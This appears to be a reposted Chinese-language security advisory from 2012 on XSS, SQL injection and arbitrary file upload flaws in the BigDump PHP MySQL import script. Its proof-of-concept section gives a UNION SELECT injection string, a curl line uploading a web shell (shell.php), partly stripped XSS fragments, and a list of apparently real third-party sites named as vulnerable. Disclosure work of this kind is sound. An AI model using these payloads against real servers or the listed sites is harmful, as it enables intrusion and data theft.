發布日期：2012-11-28

更新日期：2012-12-04

受影響系統：

ozerov BigDump 0.29b

描述：

--------------------------------------------------------------------------------

BUGTRAQ? ID: 56744

BigDump 是由德國人Alexey Ozerov 用PHP語言開發的一個工具腳本，用來導入批量mysql數據。

BigDump 0.29b、0.32b及其他版本在實現上存在跨站腳本、SQL注入、任意文件上傳漏洞，利用這些漏洞攻擊者可竊取Cookie身份驗證憑證、上傳任意文件、訪問或修改數據、利用下層數據庫內的其他漏洞。

鏈接：http://packetstormsecurity.org/files/118463/bigdump032b-shellxsssql.txt

*>

測試方法：

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能帶有攻擊性，僅供安全研究與教學之用。使用者風險自負！

http://www.example.com/bigdump.php?start= [SQL]

http://www.example.com/bigdump.php?start= [XSS]

http://www.example.com/bigdump.php [File Upload]

# Expl0it/P0c ###################

http://site.com/bigdump.php?start=? < Sql Vulnerability Path >

http://site.com/bigdump.php?start=? < Xss Vulnerability Path >

http://site.com/bigdump.php? ? ? ? < Arbitrary Upload? Path >

# Expl0it/P0c/upload ###############

Input $ch = curl_init("http://site.com/bigdump.php?start=shell.php")

Output $ch = curl_init("http://site.com/bigdump/uploads/shell.php")

# Expl0it/P0c/Sql ###################

+union+select+1,2,3,4,5,6,7,8,9,10--+

# Expl0it/P0c/Xss ###################

">

# Vulnerability/C0de/###################

?action=step3" enctype="multipart/form-data">

Dump file:

# Samples/Arbitrart_Upload/Sql/Xss ####################

http://www.fs7a.net/vb/1/bigdump.php

http://www.lis186.com/dump/bigdump.php

http://bigw3.com/bigdump.php

http://twin.skr.jp/bigdump/bigdump.php

http://www.fs7a.net/vb/1/bigdump.php?start=%

http://www.lis186.com/dump/bigdump.php?start=%

http://bigw3.com/bigdump.php?start=%

http://twin.skr.jp/bigdump/bigdump.php?start=%

建議：

--------------------------------------------------------------------------------

廠商補丁：

ozerov

------

目前廠商還沒有提供補丁或者升級程序，我們建議使用此軟件的用戶隨時關注廠商的主頁以獲取最新版本：

總結

以上是生活随笔為你收集整理的任意文件上传mysql_BigDump 跨站脚本、SQL注入、任意文件上传漏洞的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。